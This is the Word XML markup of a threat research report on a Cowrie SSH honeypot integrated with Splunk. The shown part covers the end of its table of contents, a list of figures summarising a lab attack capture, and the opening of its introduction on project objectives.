        </w:p>
        <w:p w14:paraId="516FC949" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686590" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Malware Deployment Attempt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686590 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4889CCA9" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686591" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Attack Timing and Automation Confirmation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686591 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="697D52BF" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686592" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.4  MITRE ATT&amp;CK Mapping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686592 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07DC640C" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686593" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.5  Security Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686593 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CF6E119" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686594" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation 1 — Disable Root SSH Authentication</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686594 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16265387" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686595" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation 2 — Implement Automated Rate Limiting and Lockout</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686595 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="575F148B" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686596" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation 3 — Deploy Real-Time Credential File Access Monitoring</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686596 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75A402AB" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686597" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.6  Conclusions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686597 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="300742B9" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686598" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix — Quick Reference</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686598 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21977C90" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686599" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A — Cowrie Commands</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686599 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B92737C" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686600" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B — Linux Operational Commands</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686600 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C652759" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686601" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C — Threat Intelligence Resources</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686601 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FA37039" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686602" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>D — Operational Notes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686602 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C153451" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7484D9B2" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A000001" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>List of Figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A000002" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
        </w:tabs>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1: </w:t>
      </w:r>
      <w:r>
        <w:t>Cowrie honeypot service active — PID confirmed via cowrie status command on Ubuntu Server 22.04</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Section 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A000003" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
        </w:tabs>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2: </w:t>
      </w:r>
      <w:r>
        <w:t>Port 2222 confirmed listening — honeypot accepting inbound SSH connections</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Section 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A000004" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
        </w:tabs>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3: </w:t>
      </w:r>
      <w:r>
        <w:t>Cowrie JSON log ingestion verified in Splunk — data pipeline operational</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Section 5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A000005" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
        </w:tabs>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4: </w:t>
      </w:r>
      <w:r>
        <w:t>Splunk — Top attacker IP addresses. Single source (192.168.56.26) responsible for all 65 recorded events</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Section 5.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A000006" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
        </w:tabs>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5: </w:t>
      </w:r>
      <w:r>
        <w:t>Splunk — Successful login events. Nine sessions captured at 22:38:15 on 2026-06-05 using root credentials</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Section 5.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A000007" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
        </w:tabs>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6: </w:t>
      </w:r>
      <w:r>
        <w:t>Splunk — Attacker command sequence. Seven post-login commands captured mapping to five MITRE ATT&amp;CK techniques</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Section 5.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A000008" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
        </w:tabs>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7: </w:t>
      </w:r>
      <w:r>
        <w:t>Splunk — Attack timeline by event type. All 65 events concentrated in a single automated burst at 22:38 UTC</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Section 5.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A000009" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
        </w:tabs>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 8: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Splunk — Real-time alert rule active. Triggers on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cowrie.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>login.success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> events exceeding zero within one minute</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Section 5.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A000010" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A06C70" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc231686535"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="506CD862" w14:textId="79253842" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc231686536"/>
      <w:r>
        <w:t>1.1 Project Objectives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7AB5FD51" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Credential-based attacks against exposed SSH services represent one of the most persistent and costly threats facing organisations today. IBM's 2024 Cost of a Data Breach Report recorded the global average breach cost at $4.88 million, with cloud credential theft identified as a primary driver — yet most organisations deploy perimeter defences that block attacks without capturing the intelligence needed to understand, anticipate, or prevent them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C404D6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This project addresses that gap directly. By engineering a production-grade Cowrie SSH honeypot on Ubuntu Server — configured to emulate a legitimate corporate file server complete with fake database credentials and AWS access keys — this deployment was designed to attract, engage, and forensically document attacker behaviour from first connection to post-login exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA5BB0" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The objectives were to produce verified, evidence-backed threat intelligence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339C2F87" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Map real attack sequences to MITRE ATT&amp;CK techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D8178D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Identify credential harvesting patterns targeting database and cloud infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C36F7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Integrate captured data into a Splunk SIEM pipeline with real-time alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A58B27" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Produce a threat research report replicating SOC analyst workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED846D0" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
